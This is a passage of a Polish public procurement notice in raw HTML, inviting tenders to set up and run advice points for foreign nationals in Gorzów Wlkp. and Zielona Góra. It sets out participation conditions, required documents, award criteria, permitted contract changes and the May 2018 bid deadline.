FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik do SIWZ</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik do SIWZ</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zdolność technicznaZamawiający wymaga, aby Wykonawca oświadczył, że dysponuje lub najpóźniej do dnia zawarcia umowy będzie dysponował lokalem w Gorzowie Wlkp. (dla części nr I) i w Zielonej Górze (dla części nr II) spełniającym następujące kryteria:- lokalizacja punktu nie większej niż 3 km od ścisłego centrum miasta (liczone odpowiednio od lokalizacji ratusza w Zielonej Górze i Katedry w Gorzowie Wlkp. zgodnie z mapą google dostępną pod adresem https://www.google.pl/maps),- lokalizacja punktu w odległości nie większej niż 500 metrów od przystanku komunikacji publicznej,- punkt musi być w miejscu ogólnodostępnym dla cudzoziemców oraz zapewniać poufność rozmów,- punkt musi umożliwiać obsługę osób niepełnosprawnych oraz rodziców z dziećmi,Zdolność zawodowaO udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują następującymi osobami, które będą uczestniczyć w wykonywaniu zamówienia:1. Doradca integracyjny - wymagania: wykształcenie co najmniej średnie, umiejętność posługiwania się językiem ukraińskim lub rosyjskim w stopniu umożliwiającym swobodną komunikację, 2. Prawnik - wymagania:posiadanie uprawnień wymaganych dla radcy prawnego lub adwokata oraz posiadanie 2 letniego doświadczenia zawodowego w udzielaniu porad prawnych,3. Psycholog - wymagania:wykształcenie wyższe magisterskie na kierunku psychologia oraz posiadanie 2 letniego doświadczenia zawodowego w udzielaniu porad psychologicznych.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy, w przypadku, gdy Zamawiający może uzyskać taki dokument w sposób określony w art. 26 ust. 6 ustawy, Zamawiający nie będzie wzywał Wykonawcy do jego złożenia.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.2. Zamawiający wymaga, aby Wykonawca oświadczył, że dysponuje lub najpóźniej do dnia zawarcia umowy będzie dysponował lokalem w Gorzowie Wlkp. (dla części nr I) i w Zielonej Górze (dla części nr II) spełniającym następujące kryteria:- lokalizacja punktu nie większej niż 3 km od ścisłego centrum miasta (liczone odpowiednio od lokalizacji ratusza w Zielonej Górze i Katedry w Gorzowie Wlkp. zgodnie z mapą google dostępną pod adresem https://www.google.pl/maps),- lokalizacja punktu w odległości nie większej niż 500 metrów od przystanku komunikacji publicznej,- punkt musi być w miejscu ogólnodostępnym dla cudzoziemców oraz zapewniać poufność rozmów,- punkt musi umożliwiać obsługę osób niepełnosprawnych oraz rodziców z dziećmi.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin uruchomienia punktu </TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie personelu</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie ceny:1) jeśli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa w szczególności zmiany stawek podatku VAT. W takim przypadku zmianie ulegnie kwota brutto, natomiast kwota netto pozostanie bez zmian,2) w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę - na wniosek Wykonawcy z załączeniem dowodów (tj. w szczególności kopie umów o pracę pracowników biorących udział w wykonaniu zamówienia) potwierdzających, że zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę,3) w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - na wniosek Wykonawcy z załączeniem dowodów potwierdzających, że zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę.2. Zmiany terminu i sposobu realizacji umowy w przypadku wystąpienia okoliczności wynikających z siły wyższej (np. powodzie, huragany, gwałtowne burze, itp.), uniemożliwiających realizację usługi.3. Warunkiem wprowadzenia zmian do zawartej umowy jest sporządzenie pisemnego aneksu podpisanego przez obie strony Umowy pod rygorem nieważności.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-05-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Utworzenie i prowadzenie Punktu informacyjno-doradczego dla cudzoziemców na potrzeby realizacji projektu pt. ,,Lubuska Inicjatywa Integracji Cudzoziemców" realizowanego w ramach Programu Krajowego Fundusz Azylu, Migracji i Integracji w Gorzowie Wlkp.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utworzenie i prowadzenie punktu informacyjno-doradczego na potrzeby realizacji projektu pt. ,,Lubuska Inicjatywa Integracji Cudzoziemców" realizowanego w ramach Programu Krajowego Fundusz Azylu, Migracji i Integracji, w którym obywatele państw trzecich otrzymają bezpłatną kompleksową informację i pomoc w zakresie funkcjonowania w środowisku lokalnym.Założenia funkcjonowania punktu:1) Punkt będzie zlokalizowany w miejscu ogólnodostępnym dla cudzoziemców, zapewniającym poufność rozmów.2) Wykonawca na własny koszt i własnym staraniem przystosuje lokal do świadczenia usług dla cudzoziemców.3) Punkt musi umożliwiać obsługę osób niepełnosprawnych oraz rodziców z dziećmi.4) Punkt musi zostać wyposażony w niezbędny sprzęt biurowy, tj. co najmniej:a) niezbędne meble biurowe dla pracowników (stanowisko biurowe) oraz dla odbiorców usługi (wieszak, stół i krzesła), b) sprzęt multimedialny (komputer\laptop z oprogramowaniem, faks, drukarka, skaner lub urządzenie wielofunkcyjne),c) telefon z numerem stacjonarnym,d) stały dostęp do internetu,e) wyposażenie socjalne (ekspres, czajnik, zestaw naczyń, dystrybutor z wodą).5) Wykonawca zapewni stały adres e-mail dla punktu, służący prowadzeniu korespondencji z Zamawiającym oraz z odbiorcami usług.6) W punktach będzie wydzielony kącik dla dzieci, który należy wyposażyć w stolik z krzesełkami, regał, zabawki, pufę, materiały piśmiennicze, dywanik.7) Wykonawca zapewni niezbędne do świadczenia usług materiały biurowe.8) Punkt będzie otwarty 5 dni w tygodniu, zgodnie z zaakceptowanym przez Zamawiającego harmonogramem, po minimum 6 godzin dziennie, w tym co najmniej jeden dzień do godziny 18:00 z wyłączeniem dni ustawowo wolnych od pracy.9) Usługi doradczo-informacyjne będą mogły być świadczone również poza lokalem Wykonawcy, np. w zakładach pracy.10) Wykonawca zapewni zarówno pracownikom, jak i odbiorcom usług możliwość korzystania z toalety.11) W punkcie nie może być prowadzona inna działalność gospodarcza.12) Usługi świadczone będą bezpłatne. Zakłada się, że w punkcie cudzoziemiec otrzyma rzetelną, kompleksową pomoc i doradztwo m.in. w kwestiach legalizacji pobytu, administracyjnych i prawnych, przysługujących praw pracowniczych, doradztwa i pomocy integracyjnej, opieki zdrowotnej, psychologicznej i socjalnej, opieki nad dziećmi oraz łączenia rodzin.13) Klientami punktu będą:a) Cudzoziemcy nie będący obywatelami UE, przebywający na terytorium RP legalnie, zgodnie z przepisami ustawy z dnia 12 grudnia 2013 r. o cudzoziemcach (z późniejszymi zmianami):- na podstawie wizy, o której mowa w art. 60 ust. 1 pkt. 4-6, 9-13, 17, 19-21, 23-25, - na podstawie zezwolenia na pobyt czasowy, pobyt stały (art. 195, 